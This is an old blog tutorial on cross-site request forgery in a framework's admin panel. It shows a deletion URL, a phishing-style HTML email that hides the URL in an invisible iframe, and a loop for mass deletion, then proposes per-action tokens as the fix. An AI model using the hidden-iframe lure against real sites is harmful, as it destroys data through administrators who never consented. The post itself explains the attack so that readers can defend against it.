This Tutorial covers Cross Site Scripting (XSS), Cross Site Forgery Requests (CSFR), SQL Injection, globals, and much more!
Showing posts with label secure. Show all posts
Showing posts with label secure. Show all posts
Tuesday, August 18, 2009
Thursday, August 13, 2009
Basic Cross-site request forgery
Now, I'm woking with a new framework. It's a new one, so that I think it's not secured.
Assume that I'm a customer and after use this source code, if I find out any bug... what will happen if I want to be a 'bad man' not 'bat man' :))
After analyze I have an action in administrator panel.
Example, when working with customer module:
"http://our_local_server/administrator/index.php?module=loadajax&action=deleteall&table=user&fprimary=id&cond=0,%276%27&fname=etc"
Consider the bold text :
When I call this url, system will 'delete' all the item include in condition value %27 means ' label (0,'6'). The result is the item with id=6 will be deleted from database.
Ok, now I compose an email html like :
<@body>
You won $1,000,000
<@iframe src="http://our_local_server/administrator/index.php?page=loadajax&action=deleteall&table=user&fprimary=id&cond=0,%276%27&fname=etc" width="0" height="0">
<@/body>
Will you read it???
I wont. But it's only example ^^.
Send it to the administrator of site when him/her logged in.
I dont need to login or something else with this system.
The administrator will do it for me because he/she have authiencation.
Imagine if I call an url in a loop :
for($i=0;$i<=999999;++$i) { //call the action url here }
What will happen :D
Solution: Assign a token value for any action.
Example:
index.php?page=loadajax&action=deleteall&table=user&fprimary=id&cond=0,%276%27&fname=etc&token=10d3612ccee6f20d650288855624f9ad
And check this token before execute any action.
Subscribe to:
Posts (Atom)